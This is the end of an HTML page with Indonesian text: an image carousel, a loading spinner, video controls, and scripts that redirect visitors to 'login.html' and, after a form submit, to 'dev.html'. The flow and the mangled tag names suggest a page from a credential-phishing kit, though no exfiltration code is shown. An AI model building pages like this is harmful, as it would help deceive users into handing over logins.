   <div class="owl-item item active" style="background-color: #000; box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; ; background: transparent; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNmeP75Ev6Cw-purlAGWVZjlS_jwUbj1-GPhmzCwic1OP2NdUOitQXBIbGRkzNUabIezH8sWHlqVfZhYfNNvU5pV4fiVSZudmzdN98ymrYu04dZFX65K43_0AjvnBc2Ss7NwGOf6xr8FVQwiFwHJZKl_DbouBF0FUnXI4WSuevOvVdALQ7gA_m72vvEBQ/s1080/AddText_04-24-01.59.23.jpg" style="border-radius: 8px; height: 154px"></div>
   <div class="owl-item item active" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; background: transparent"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7CjmR21syGPxsi4zmVfz9yIyXNR0mLxtwDodD2X6pRxWpZsJQQDdhHE9iOvZfXr3TJdVErYXG_-GamfXX4atUMS4n5FhGyAB8eQMRBLGBxudz2iu7p3J0mb-VPQzARwzeyzB0C06NKdDnLW7xOmEZLqDQy1qnddcol8ch3mBb6z2_lHlFsqkxeF0sNrY/s1080/AddText_04-24-01.16.57.jpg"  style="border-radius: 8px; height: 154px"></div>
   
           
           
             
            </div></div></div>
           
  
</div>    

</footer>
  <center>
     <div id="process1" name="process" class="process1" style="display: none;">
            <div class="loading">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png" id="loading" style="margin-top: -2px">
            </div>
        </div>
        </center>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW-3Xsq1r5wVb5r0tfUzFr9KzB9hy1r0-W4GkBcDTnYujbw_NNeMWw-l8MZCk4RYNJpcSZRf5tv-TPa5HnYvv_x-EzticmLwx1vO4bIlqTJAiyk4-i96QjCFlPHT8BMy9nF15ISyjxVVOz2DAv8osBBR9onrE3lJf96Vw5erolKuss9ZrTFAFhoJAU4Js/s1080/1704436332522.png" style="width: 100%; position: fixed; bottom: -5; left: 0; right: 0; margin: 0px auto; z-index: -1;"> 

<script>
    const video = document.getElementById("video");
video.addEventListener("play", handleFirstPlay, false);

let hasPlayed = false;
function handleFirstPlay(event) {
  if (!hasPlayed) {
    hasPlayed = true;

    // Remove listener so this only gets called once.
    const vid = event.target;
    vid.removeEventListener("play", handleFirstPlay);

    // Start whatever you need to do after first playback has started
  }
}

</script>
<!-- partial -->
  <script>
var owl = $('.owl-carousel');
owl.owlCarousel({
    items:1.2, 
  // items change number for slider display on desktop
  
    loop:true,
    margin:10,
    autoplay:true,
    autoplayHoverPause:true
});      
      
  </script>

<script>
    /* Toggle Button to Unmute the Video */

function toggleMute() {
    var video = document.getElementById('video');
    if (video.muted) {
        video.muted = false;
    } else {
        video.muted = true;
    }
}

/* Delay Function to Add SetTimeOut After Defined Interval */

function delay(time) {
    return new Promise((resolve) => setTimeout(resolve, time));
}

/* Show Video Function to Add Display Property to Show the Video on Click of Button which will fulfilled User Interaction Needs to Browser to Run the Video with Unmute State */

function showVideo() {
    var element = document.getElementById('video');
    var button = document.getElementById('button');
    element.style.display = 'block';
    button.style.display = 'none';
    delay(100).then(() => toggleMute());
}
</script>
<script>
 function letsgo(){
 $("#process1").show();    
 window.location.href="login.html";
 }   
</script>
</smalxs>
</main>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script type='text/javascript' src='k.js'></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
        $( document ).ready(function() {
             $('welalxcome').fadeIn(1000);
           $('body').css('background', '#118EEA');  
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
$('body').css('background', '#ffffff');  
            },1500)
        });
</script>
 
<script>
 $(document).ready(function(){
    $('#formHP').submit(function(e) {
    event.preventDefault();
    $('#process1').show();
document.getElementById('kirims').innerHTML = "Memproses....";

 setTimeout(function(){
  window.location.href='dev.html';
 
    }, 1000);
 
        
    });
 });
  
     
</script>
</body>
</html>
